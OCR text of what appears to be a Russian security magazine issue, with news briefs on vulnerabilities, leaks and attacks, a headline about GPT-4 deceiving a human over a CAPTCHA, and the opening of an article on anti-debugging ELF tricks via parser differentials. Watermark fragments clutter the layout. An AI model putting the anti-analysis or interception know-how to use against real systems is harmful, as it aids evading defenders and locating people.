Некоторые из этих вопросов касаются потока информации, генерируемой ИИ, неконтролируемой автоматизации рабочих мест, развития систем, которые превосходят человека и из-за которых люди могут «устареть», а также контроля над цивилизацией в целом.
Эксперты считают, что мы достигли того момента, когда следует обучать более продвинутые ИИ-системы только под строгим надзором и лишь имея уверенность в том, что риски, возникающие при их развертывании, управляемы.
««Поэтому мы призываем все ИИ лаборатории немедленно приоста новить обучение ИИ систем, более мощных, чем GPT-4, как минимум
на шесть месяцев, — говорится в письме. — Эта пауза должна быть
публичной и поддающейся проверке, и она должна затрагивать всех ключевых участников. Если такая пауза не может быть взята быстро, » правительства должны вмешаться и ввести мораторий».
Во время этой паузы разработчикам ИИ предлагается собраться вместе и договориться о создании единых протоколов безопасности, которые затем смогут использоваться для аудитов, проводимых внешними независимыми экспертами.
Кроме того, подписанты полагают, что политикам следует принять защитные меры и заняться регулированием данной сферы. В частности, предлагается создать систему «водяных знаков», позволяющих эффективно отличать подлинный контент от фальшивого, проработать возможность возложения ответственности за вред, причиненный материалами, созданными ИИ, а также выделить государственное финансирование на исследование рисков, связанных с ИИ.
Письмо не содержит призывов полностью прекратить разработку ИИ. В нем, напротив, подчеркиваются потенциальные опасности, связанные с растущей конкуренцией между разработчиками ИИ, стремящимися занять свою нишу на быстро растущем рынке.
««С ИИ человечество может наслаждаться прекрасным будущим. Пре успев в создании мощных ИИ систем, мы можем наслаждаться „рас цветом ИИ“ и пожинать плоды, разрабатывая эти системы для все общего блага и давая обществу шанс адаптироваться. Общество при
остановило развитие других технологий, несущих потенциально |
» |
|
катастрофические последствия. Мы можем поступить так же |
||
|
||
и здесь», — заключают эксперты. |
|
2 МИЛЛИАРДА ДОЛЛАРОВ ВЫВЕЛИ С BINANCE
За последнюю неделю марта отток средств с криптовалютной биржи Binance составил 2,1 мил лиарда долларов США. Об этом сообщило издание Wall Street Journal со ссылкой на данные аналитической платформы Nansen.
На общедоступных кошельках биржи в настоящий момент содержится 63,2 миллиарда дол ларов. Темпы снятия средств превысили обычную активность и ускорились после объявления Комиссии по торговле товарными фьючерсами США (CFTC) о том, что та подает в суд на криптовалютную биржу, обвиняя ее в незаконной деятельности на территории США.
Доля компании на рынке упала на 30% с 24 марта 2023 года, сообщают аналитики компании
CryptoCompare.
Продолжение статьи →
|
|
|
|
hang |
e |
|
|
|
|
||
|
|
|
C |
|
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
|||
|
|
p |
|
|
|
|
|
g |
|
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
|
ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
|||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
← Начало статьи
УТЕКЛИ ИСХОДНИКИ
Компания Twitter добилась удаления с GitHub внутренних исходных кодов своей платформы и инструментов, которые утекли в открытый доступ несколько месяцев назад. Теперь Twitter требует от GitHub раскрыть данные человека, который слил исходники, и всех, кто получал к ним доступ.
В конце месяца представители GitHub были вынуждены отреагировать на нарушение закона «Об авторском праве в цифровую эпоху» (DMCA) и жалобу Twitter, которая заявила об утечке проприетарных исходных кодов и внут- ренних инструментов, что могло представлять угрозу для безопасности компании.
Согласно жалобе, источником утечки стал пользователь FreeSpeechEnthusiast, причем его ник — явная отсылка к словам Илона Маска, который часто называет себя абсолютистом в вопросах свободы слова (free speech absolutist). То есть, вероятно, информацию слил недовольный сотрудник Twitter (скорее всего, уволенный после покупки компании Маском). В настоящее время учетная запись FreeSpeechEnthusiast по-прежнему активна, но у пользователя нет других общедоступных репозиториев.
По информации СМИ, когда именно произошла утечка, неизвестно, но журналисты считают, что исходники были доступны в сети «в течение как минимум нескольких месяцев».
В своей жалобе на нарушение авторских прав Twitter требует от GitHub предоставить информацию об истории доступов к этой утечке, вероятно
желая определить ее источник.
«
»
В настоящее время Twitter пытается использовать судебную повестку, чтобы вынудить GitHub предоставить идентифицирующую информацию о пользователе FreeSpeechEnthusiast и любом другом, кто получил доступ к утечке и распространял исходные коды Twitter. Полученные данные будут использованы для дальнейших судебных исков.
Представители GitHub не сообщают, сколько людей получили доступ к утекшим исходным кодам Twitter или скачали их, но у FreeSpeechEnthusiast было мало подписчиков. Несмотря на это, отмечается, что утечка может иметь серьезные последствия для Twitter, так как исходники могут быть тщательно изучены посторонними для выявления потенциально опасных уязвимостей.
ФИШЕРОВ СТАЛО БОЛЬШЕ
Group-IB сообщила, что в 2022 году заблокировала более 59 000 фишинговых сайтов,
из которых более 7000 были обнаружены в российском сегменте интернета, что в два раза больше, чем годом ранее.
Мошеннические ресурсы похищали у россиян логины и пароли, данные банковских карт, аккаунты в мессенджерах.
Если в 2021 году количество заблокированных СERT-GIB ресурсов в интернете составило 31 455, то в 2022 году их число увеличилось до 59 282.
Взонах .ru и .рф количество заблокированных сайтов выросло более чем вдвое: с 3210
до 7121.
Вцелом за прошлый год только в зонах .ru и .рф специалисты обнаружили 20 170 фишинговых доменов (в 2021 году их число составляло 15 363 домена).
Злоумышленники пользовались услугами хостинг-провайдеров, расположенных в основном в США, России и Германии. При этом каждый третий сайт мошенников был в доменной зоне
.com (33,8% от общего числа ресурсов).
ACROPALYPSE
УГРОЖАЕТ WINDOWS
И PIXEL
Разработчики Microsoft экстренно обновили инструменты Snipping Tool и Snip and Sketch («Ножницы») в Windows 10 и 11, исправив недавно обнаруженную уязвимость, получившую название aCropalypse. Баг позволял восстановить оригинал любого изображения, отредактированного с помощью «Ножниц».
Изначально проблему aCropalypse (CVE-2023-21036) обнаружили в устройствах Google Pixel и связали с редактором скриншотов Markup, который появился на смартфонах в 2018 году, с релизом Android 9.0 Pie.
Суть уязвимости заключалась в том, как именно файл изображения открывается для редактирования и сохраняется: обрезанные или закрашенные при помощи Markup данные все равно остаются в новом сохраненном файле, что позволяет восстановить примерно 80% исходной картинки.
Восстановление закрашенного номера банковской карты
Исследователи предупреждали, что aCropalypse может раскрывать конфиденциальную информацию пользователей, если они когда-либо редактировали изображение с помощью Markup, а затем делились этим файлом с другими людьми или публиковали его в интернете.
Из-за уязвимости утечь в сеть могла самая разная информация, включая конфиденциальные данные из документов, данные о местоположении, конфиденциальные URL-адреса на скриншотах браузера, номера банковских карт, лица и другие нежелательные подробности на откровенных фото. Словом, все то, что обычно обрезают и замазывают на фотографиях и скриншотах.
Вскоре после раскрытия данных об оригинальной проблеме выяснилось, что эта уязвимость представляет опасность и для инструментов Snipping Tool и Snip and Sketch в Windows 10 и 11. В данном случае точно так же возможно частично восстановить оригинальный вид ранее обрезанных картинок.
Эксперты продемонстрировали успешное восстановление изображений в формате PNG и допустили, что то же самое можно проделать и с файлами
JPG.
В итоге проблеме был присвоен идентификатор CVE-2023-28303.
В Windows 11 для ее устранения следует обновить Snipping Tool до вер-
сии 11.2302.20.0, а в Windows 10 патч получил Snip and Sketch версии 10.2008.3001.0.
Теперь при обрезке изображения и перезаписи исходного файла инструмент удаляет неиспользуемые данные корректно, а не помещает их в конец файла, после IEND.
НА 7% СНИЗИЛАСЬ СКОРОСТЬ МОБИЛЬНОГО ИНТЕРНЕТА В РФ
По данным TelecomDaily, в феврале 2023 года скорость мобильного интернета в регионах России снизилась на 7% по сравнению с предыдущим годом (до 18,3 Мбит/с). При этом в Москве
скорость мобильного интернета выросла на 32% до 34,7 Мбит/с.
Исследователи объясняют ухудшение доступа дефицитом сетевого оборудования и установкой новых базовых станций в первую очередь в крупных городах. Глава TelecomDaily Денис Кусков отмечает, что сетевое оборудование постепенно устаревает и требует модернизации, а складские запасы не безграничны. Именно поэтому растет разрыв в качестве интернет-доступа между столицей и регионами. Операторы наращивают пропускную способность сетей медленнее, чем растет интернет-трафик.
ДРОНЫ DJI РАСКРЫВАЮТ ЛОКАЦИЮ ОПЕРАТОРОВ
Специалисты из Рурского университета в Бохуме и Центра информационной безопасности имени Гельмгольца в Германии (CISPA) рассказали, что им удалось расшифровать сигналы, передаваемые дронами DJI. Оказалось, что устройства транслируют не только свои GPS-координаты и уникальный ID дрона, но и GPS-координаты своего оператора.
Исследователи пишут, что такие девайсы становятся все востребованнее в зонах боевых действий, ведь они могут вести наблюдение на большой высоте, проводить разведку и даже использоваться как оружие, тогда как их оператор надежно скрыт на расстоянии до нескольких километров от дрона.
Однако оказалось, что местоположение пилотов не такая уж большая тайна. Фактически любой человек, у которого есть простое и дешевое радиооборудование, может перехватить сигналы дронов и расшифровать их, таким образом получив координаты пилота.
Всвоем докладе ученые рассказывают, что им удалось расшифровать радиосигналы дронов DJI и декодировать используемый ими радиопротокол DroneID. Деконструировав сигналы, исследователи увидели, что каждый дрон DJI передает по протоколу DroneID не только свои GPS-координаты и уникальный идентификатор дрона, но и GPS-координаты своего оператора.
Исходно система DroneID компании DJI создавалась для того, чтобы позволить правительствам, регулирующим органам и правоохранителям контролировать беспилотники и предотвращать злоупотребления ими. Но хакеры и ИБ-исследователи уже давно говорят о том, что DroneID не зашифрована и открыта для любого, кто способен принимать радиосигналы.
Так, DroneID уже подвергалась критике прошлой весной, когда украинские власти раскритиковали компанию за то, что российские военные используют дроны DJI для наведения ракет, а также определяют местонахождение операторов украинских дронов DJI по их радиосигналам. В ответ на это компания вообще заявила о недопустимости использования своих потребительских беспилотников в военных целях, а затем прекратила продажи устройств как в России, так и на Украине.
При этом китайский производитель уже давно продает государственным регуляторам и правоохранительным органам специальное устройство Aeroscope, которое позволяет перехватывать и декодировать данные DroneID, определяя местоположение любого дрона и его оператора на расстоянии до 48 км.
Ранее в компании подчеркивали, что протокол DroneID зашифрован и, следовательно, недоступен для тех, у кого нет устройства Aeroscope, которое любой желающий приобрести просто не сможет. Однако позже ИБ-иссле- дователь Кевин Финистерре (Kevin Finisterre) продемонстрировал перехват некоторых данных DroneID при помощи свободно доступного SDR Ettus.
Витоге представитель DJI признал в беседе с журналистами, что передачи на самом деле не зашифрованы.
Всвоем докладе немецкие ученые продемонстрировали, что сигналы дронов действительно могут быть расшифрованы и прочитаны и без всякого Aeroscope, что позволяет прослушивать DroneID для точного определения положения как самого беспилотника, так и его оператора.
Вкачестве доказательства своих выводов исследовательская группа опубликовала на GitHub прототип инструмента для получения и расшифровки данных DroneID.
Исследователи пошли даже дальше, чем Финистерре: они изучили прошивку дрона DJI и его радиосвязь, отреверсили DroneID и создали инструмент, который может принимать передачи DroneID с помощью уже упомянутого выше Ettus или более дешевого HackRF, который стоит всего несколько сотен долларов (по сравнению с 1000+ долларов за устройства Ettus). В итоге это позволяет выполнять все доступные Aeroscope действия без него самого.
Хотя исследователи тестировали перехват сигналов лишь на расстоянии от 15 до 25 футов (от 4,5 до 7,5 м), они отмечают, что даже не пытались увеличить расстояние, так как его возможно без труда расширить с помощью дополнительных технических решений.
Теперь ИБ-эксперты и СМИ предполагают, что, независимо от мотивов, которыми компания DJI руководствовалась, создавая DroneID и рекламируя Aeroscop как единственно подходящее устройство для перехвата сигналов, доступность информации о местоположении оператора дрона и тот факт, что эти данные можно легко перехватить (без всякого Aeroscope), окажут серьезное влияние на использование квадрокоптеров в зонах боевых действий и других враждебных условиях.
В начале марта комитет палаты представителей конгресса США принял законопроект, который может позволить президенту полностью запретить TikTok в стране. В конце 2022 года соцсеть уже запретили устанавливать на государственные устройства более чем в 20 штатах, а некоторые университеты заблокировали его в Wi-Fi-сетях своих кампусов.
Политики говорят, что TikTok, принадлежащий китайской компании ByteDance и насчитывающий 150 миллионов пользователей в США, может угрожать национальной безопасности страны.
→ «Зачем впускать троянского коня в свою крепость? Зачем привносить эту возможность в США, когда китайцы могут манипулировать данными, которые мы видим, и либо включать в них то, что они хотят показать нашему населению (в том числе материалы, вызывающие разногласия в обществе), либо удалять то, что выставляет их в плохом свете и что они не хотели бы показать американскому народу?»
— такими вопросами задавался Роб Джойс, глава отдела кибербезопасности в АНБ, на кон-
ференции Silverado Accelerator Conference, прошедшей в конце марта.
Продолжение статьи →
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
|||||
|
|
|
|
to |
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
c |
|
|
|
|
.c |
|
||
|
|
p |
df |
|
|
|
|
e |
|
|||
|
|
-x |
|
|
g |
|
|
|
||||
|
|
|
|
n |
|
|
|
|
||||
|
|
|
|
ha |
|
|
|
|
|
← Начало статьи
ЖУРНАЛИСТУ ПРИСЛАЛИ ФЛЕШКУ С БОМБОЙ
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
c |
|
|
|
.c |
|
||
|
|
p |
df |
|
|
|
e |
|
|||
|
|
|
|
|
g |
|
|
|
|||
|
|
|
|
|
n |
|
|
|
|
||
|
|
|
|
-x ha |
|
|
|
|
|
Полиция Эквадора расследует массовую атаку на медиаорганизации по всей стране. Журналист и ведущий Ecuavisa был ранен после того, как при подключении к компьютеру взорвалась USB-флешка, которую он получил по почте. Такие же девайсы были отправлены в редакции еще как минимум пяти эквадорских СМИ.
Глава отдела уголовных расследований национальной полиции Эквадора Хавьер Чанго Льерена (Xavier Chango Llerena) заявил, что власти обнаружили конверты с предполагаемыми взрывными устройствами в редакциях еще четырех СМИ: двух в Гуаякиле и двух в Кито. Еще одна взрывоопасная флешка была найдена на складе компании по доставке посылок.
Врезультате взрыва USB-накопителя пострадавший журналист Ecuavisa Ленин Артиеда (Lenin Artieda) получил травмы рук и лица. По данным полиции, Артиеде повезло — взорвалась только половина заложенного в USB-накопи- тель заряда, и исход мог быть более печальным, если бы все прошло так, как планировали злоумышленники.
Также сообщается, что активация взрывного устройства могла произойти от электрического заряда, который флешка получила при подключении. По словам Льерены, накопитель мог содержать гексоген, хотя это пока не подтверждено лабораторным анализом.
Организация по защите интересов прессы и свободы слова Fundamedios осудила это нападение и сообщила, что еще минимум трое журналистов,
втом числе из TC Televisión, Teleamazonas и радио Exa FM, получили по почте такие USB-накопители и письма с угрозами.
Вчастности, Альваро Росеро (Álvaro Rosero), работающий на ради-
останции Exa FM, получил конверт с аналогичной флешкой 15 марта 2023 года. Он отдал устройство своему продюсеру, который использовал кабель с адаптером для подключения флешки к компьютеру. В этот раз накопитель не взорвался. Полиция установила, что в устройстве содержалась взрывчатка, но из-за адаптера, использованного продюсером, заряд не активировался.
ИБ-специалист и инженер Майкл Гровер (Michael Grover), также известный под ником MG, которого многие знают как автора вредоносного кабеля O.MG, демонстрировал взрывающиеся USB-флешки еще в 2018 году (исклю- чительно как PoC и в качестве шутки), а мы тогда посвятили исследованиям MG большую статью.
««Даже маленький флеш накопитель опасен с чем то вроде „сем текса“ на борту и достаточно быстродействующим запалом. Ваша
рука будет находиться прямо на накопителе, когда на него будет подано питание, — объяснил Гровер теперь. — Не могу сказать, использовались ли такие атаки в реальности, но меня совсем не уди
вит, если использовались. Я знаю несколько изданий, где всю почту сканируют на наличие взрывчатых веществ и других опасных пред » метов».
Исследователь говорит, что подобные атаки, к сожалению, могут быть весьма эффективными для террористов. MG надеется, что произошедшее вынудит большее количество изданий тщательно проверять входящую корреспонденцию.
Кто именно посылает такой «сигнал» журналистам, пока остается неясным. Fundamedios пишет, что одно из сообщений, сопровождавших опасную флешку, было направлено против неустановленной политической группы, другое гласило, что на накопителе представлены материалы, которые разоблачат Correísmo (эквадорское политическое движение, названное в честь бывшего президента Рафаэля Корреа). Кроме того, последние несколько лет в стране наблюдается всплеск преступности, который президент Гильермо Лассо связывает с незаконным оборотом наркотиков (если точнее, с деятельностью наркокартелей).
ПРОДАЖА ДОСТУПОВ К СЕТЯМ ПРЕДПРИЯТИЙ
Эксперты Positive Technologies провели исследование киберугроз 2022 года, актуальных для промышленных организаций. Выяснилось, что количество доступов к инфраструктуре орга-
низаций из этой сферы, выставленных на продажу в 2022 году, выросло с 86 до 122 — более чем на 40%.
Торговля доступами составила 75% всех объявлений, относящихся к промышленности, и их стоимость обычно колеблется от 500 до 5000 долларов США.
Индустриальный сектор привлекает легким заработком даже малоквалифицированных преступников: они получают первоначальный доступ, а затем продают его более компетентным злоумышленникам для дальнейшего развития атаки.
На протяжении последних четырех лет этот сектор входит в тройку самых атакуемых отраслей: каждая десятая успешная атака на организации приходится на промышленные предприятия.
В общей сложности в промышленных компаниях было зафиксировано 223 инцидента, вызванных атаками злоумышленников, и это на 7% больше, чем в 2021 году. Больше всего инцидентов (75) пришлось на второй квартал 2022 года, и почти все атаки (97%) на организации этого сектора были целевыми.
В большинстве атак (70%) хакеры применяли вредоносное ПО, почти в половине (44%) — методы социальной инженерии, а еще в 43% случаев эксплуатировали уязвимости ПО.
56% всех успешных атак в этой сфере привели к утечкам данных, которые в первую очередь затронули сведения, содержащие коммерческую тайну и персональную информацию.
ВЫЯВЛЕНЫ
УЯЗВИМОСТИ В TPM 2.0
Эксперты из компании Quarkslab обнаружили две серьезные уязвимости в спецификации библиотеки Trusted Platform Module (TPM) 2.0. Проблемы могут позволить аутентифицированному локальному атакующему перезаписать защищенные данные в TPM, а также выполнить произвольный код. Исследователи предупреждают, что эти проблемы могут затрагивать миллиарды устройств.
Уязвимости получили идентификаторы CVE-2023-1017 (чтение out-of- bounds) и CVE-2023-1018 (запись out-of-bounds). Обе проблемы связаны с обработкой параметров для некоторых команд TPM и позволяют злоумышленнику эксплуатировать их, отправляя TPM вредоносные команды для выполнения кода.
Согласно бюллетеню безопасности, выпущенному Trusted Computing
Group, разработчиком спецификации TPM, |
эти |
уязвимости, связанные |
с переполнением буфера, могут привести |
к |
раскрытию информации |
или повышению привилегий. Итоговое влияние проблем зависит от того, как производитель реализовал работу с конкретной областью памяти: является ли она неиспользуемой или содержит оперативные данные.
Специалисты Quarkslab говорят, что крупные технические поставщики, организации, использующие корпоративные компьютеры, серверы, IoTустройства и встроенные системы, включающие TPM, могут пострадать от этих уязвимостей. В целом же, по словам исследователей, баги «могут затрагивать миллиарды устройств».
Эксперты CERT уже заявили, что в течение нескольких месяцев информировали поставщиков о багах, стремясь повысить осведомленность и уменьшить последствия. К сожалению, в итоге лишь несколько организаций под-
твердили, что они затронуты CVE-2023-1017 и CVE-2023-1018.
Пока Lenovo — единственный крупный OEM-вендор, выпустивший собственные рекомендации по безопасности и предупредивший, что CVE-2023- 1017 влияет на некоторые из систем компании, работающие на Nuvoton TPM 2.0.
В CERT предупреждают, что эксплуатация этих уязвимостей либо позволяет получить доступ к конфиденциальным данным для чтения, либо дает возможность перезаписать обычно защищенные данные, доступные только для TPM (например, криптографические ключи).
Всем затронутым вендорам необходимо перейти на исправленную версию спецификации:
•TMP 2.0 v1.59 Errata версии 1.4 или выше;
•TMP 2.0 v1.38 Errata версии 1.13 или выше;
•TMP 2.0 v1.16 Errata версии 1.6 или выше.
Пользователям рекомендуется как можно скорее применить обновления, выпущенные Trusted Computing Group, а также другими поставщиками.
В вычислительных средах с высокой степенью надежности пользователям также рекомендуют рассмотреть возможность использования TPM Remote Attestation для обнаружения любых изменений и обеспечения защиты TPM от взлома.
Аналитики Kaspersky ICS CERT подсчитали, что во второй половине 2022 года вредоносные объекты были заблокированы на 39% компьютеров систем автоматизации в России.
Хуже того, Россия вошла в тройку лидеров в рейтинге регионов мира по доле заблокированных вредоносных объектов на компьютерах АСУ. Рост по сравнению с первым полугодием составил 9 процентных пунктов — это наиболее значительное изменение среди всех исследуемых регионов.
Эксперты связывают этот рост с увеличением доли компьютеров АСУ, которые были атакованы вредоносными объектами из интернета: их количество выросло на 12 процентных пунктов по сравнению с первым полугодием. К таким угрозам относятся в том числе вредоносные скрипты и фишинговые страницы (JS и HTML). Они были заблокированы почти на каждом пятом компьютере АСУ (18%).
УТЕКЛИ ДАННЫЕ «СБЕРСПАСИБО»
ИБ-исследователи сообщили, что в открытом доступе появились две части дампа, предположительно полученного из мобильного приложения бонусной программы «СберСпасибо» (spasibosberbank.ru).
По данным специалистов Data Leakage & Breach Intelligence (DLBI),
информацию слил тот же злоумышленник, который стоит за недавними утечками данных сервисов «СберПраво» и «СберЛогистика». В общей сложности
были обнародованы 51 977 405 уникальных номеров телефонов и 3 298 456 уникальных email-адресов.
Структура обоих сливов совпадает: в дампах содержатся номера телефонов, даты рождения, даты регистрации в сервисе, дата последнего входа, а также хешированные (SHA-1 без соли) номера банковских карт, как основной, так и дополнительных.
Еще во время первого слива эксперты предупредили, что, хотя номера банковских карт хранятся в одном из файлов в виде хеша, из-за использования устаревшего алгоритма SHA-1 «восстановить» реальные значения карт не составит никакого труда (при помощи обычного перебора). При этом только в первом дампе специалисты насчитали 100 092 292 уникальных хеша.
Выборочная проверка номеров банковских карт (через переводы с карты на карту) показала, что часть из них действительны и перевод на них возможен, а часть карт, видимо, уже неактивна, так как перевод невозможен.
Представители «СберСпасибо» сообщили СМИ, что проверят информацию о возможной утечке:
««Мы проверяем информацию и ее достоверность. Подобные сооб щения возникают часто и, как правило, связаны с мошенниками, которые пытаются продать компиляции старых баз данных под видом » оригинальных», — заявили в компании.
Поддержка Microsoft «взламывает» Windows пользователей из-за проблем с активацией
UEFI-буткит BlackLotus обходит защиту даже в Windows 11
Уязвимость в протоколе Wi-Fi IEEE 802.11 позволяет перехватывать сетевой трафик Эксперты: из чат-бота Bing может получиться убедительный мошенник
Малварь Hiatus атакует роутеры бизнес-класса, превращая их в устройства для шпионажа
Microsoft Excel будет по умолчанию блокировать надстройки XLL
На 4chan опубликовали языковую ИИ-модель LLaMa, созданную Facebook *
Бразильские власти конфискуют Flipper Zero, чтобы устройства не использовались в преступных целях
GPT-4 обманом вынудил человека решить для него CAPTCHA, притворившись слабовидящим Эксперты Google нашли 18 уязвимостей в чипсетах Samsung Exynos
* Принадлежит компании Meta, чья деятельность признана экстре
мистской и запрещена в России.
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|||||
|
wClick |
|
BUY |
o m |
COVERSTORY |
|||||
|
to |
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
.c |
|
||
|
. |
|
|
c |
|
|
|
|
||
|
p |
df |
|
|
|
e |
|
|||
|
|
|
|
g |
|
|
|
|||
|
|
|
|
n |
|
|
|
|
||
|
|
|
-x ha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
c |
|
|
|
.c |
|
||
|
|
p |
df |
|
|
|
e |
|
|||
|
|
|
|
|
g |
|
|
|
|||
|
|
|
|
|
n |
|
|
|
|
||
|
|
|
|
-x ha |
|
|
|
|
|
УЧИМ ИСПОЛНЯЕМЫЕ ФАЙЛЫ LINUX СОПРОТИВЛЯТЬСЯ ОТЛАДКЕ
Из множества техник антиотладки одна стоит особняком: ее суть — не задетектить дебаггер, а не допустить запуска в нем приложения. Поговорим о том, как это достига-
ется, о parser di erentials и фаззинге.
А потом получим такие эльфы, чтобы их с руганью не открыли отладчик и дизассемблер, но чтобы они прекрасно запустились в родной среде обитания — Linux.
kclo3
Desperately in love with Linux and C
kclo3@icloud.com
В целом парсеры — настоящий кладезь для поиска багов. И чем сложнее обрабатываемый формат, тем больше можно найти интересного. Взять, к примеру, XML. Он широко используется — скажем, для описания документов и презентаций, SOAP и RSS. И сколько проблем он несет: с его помощью реализованы XML-бомбы c billion laughs 20-летней давности, XXE-атаки, ошибки в отдельных реализациях, позволяющие сбежать из песочницы в iOS 13 и читать чужие SMS.
У LiveOver ow есть небольшое видео о том, как он создавал запускаемый файл, который тем не менее невозможно открыть в GDB и Radare2: Uncrackable Program? Finding a Parser Differential in loading ELF. Этот ролик и положил начало моему ресерчу.
Language-theoretic Security и файлы-полиглоты
Парсеры, как следует из названия, занимаются разбором (парсингом) некоего языка, который определяется грамматикой. И это касается не только языков программирования, но и форматов файлов и протоколов.
Безопасности языков, или Language-theoretic Security, посвящен сайт langsec. Если начнешь углубляться в эту тему, имена исследователей будут попадаться тебе довольно часто. Например, имя Сергея Братуся (Sergey Bratus) в контексте изучения интересностей ELF и так называемых weird machines и Мередит Паттерсон (Meredith L. Patterson) в контексте изучения протоколов и парсеров грамматик.
Так что же это за langsec такой? Проще, мне кажется, попробовать объяснить «на пальцах». В интервью IOHK Мередит Паттерсон рассказывала, как начинался langsec, — с обсуждения, что, согласно теории формальных языков, фильтры в виде регулярных выражений никогда не победят SQL-инъ- екции.
Другая вещь, которую изучают ребята из langsec, — поиск несоответствий теории и практики, а именно проблем в реализациях различных форматов и как это может быть проэксплуатировано. Одной из основных проблем называют следование закону Постела, который гласит:
«Будьтечто принимаете.консервативны в том, что отправляете, и либеральны в том, »
Изначально такой подход должен был обеспечивать надежность работы TCP. Сейчас, однако, из-за этого принципа времен зари интернета могут случаться интересные казусы. Один из них — это так называемые файлы-полиглоты. Ведь файл — это лишь набор байтов, и то, как они будут интерпретированы, зависит от парсера. А парсеры порой крайне лояльно относятся к отклонениям от спецификаций и пробуют восстановить недостающие данные из контекста либо игнорируют откровенно невалидные значения отдельных полей.
Благодаря этому можно, например, совместить скрипт, содержащий питоний веб-сервер и прочие плюшки, с валидным PDF. Это относительно легко можно сделать из-за некоторых особенностей реализации этого стандарта, таких как нефиксированное положение сигнатуры PDF внутри файла и даже возможность полного ее отсутствия.
Помимо того что создание таких файлов — занятная разминка для мозга, они, как утверждается, могут оказаться полезными при тестировании систем для обхода фильтров по типам файлов. Таким файлам посвящен далеко не один ресерч, и есть даже целый формат αcτµαlly pδrταblε εxεcµταblε, хитрым образом совмещающий в себе PE, ELF, Mach-O, sh и bootsector. По заверениям автора, этот формат способен без изменений запускаться на Linux, Mac, Windows, BSD и зачем-то на голом BIOS.
На тему файлов-полиглотов очень много информации можно найти у Ange Albertini (corkami), известного также как the le format guy.
И весьма заслуженно — в его репозиториях можно отыскать множество постеров с наглядным представлением кучи форматов: исполняемых файлов, документов, картинок, архивов и не только, а также различных заметок.
Там же находится репозиторий PoC||GTFO, содержащий много занятных статей, помимо посвященных полиглотам. Забавно, но PDF с его статьями на самом деле тоже больше чем просто
PDF.
В общем, абьюзить парсеры файлами-полиглотами довольно весело. Но поговорим теперь о более целенаправленном зле, а затем испробуем его на практике.
PARSE TREE DIFFERENTIAL ATTACK
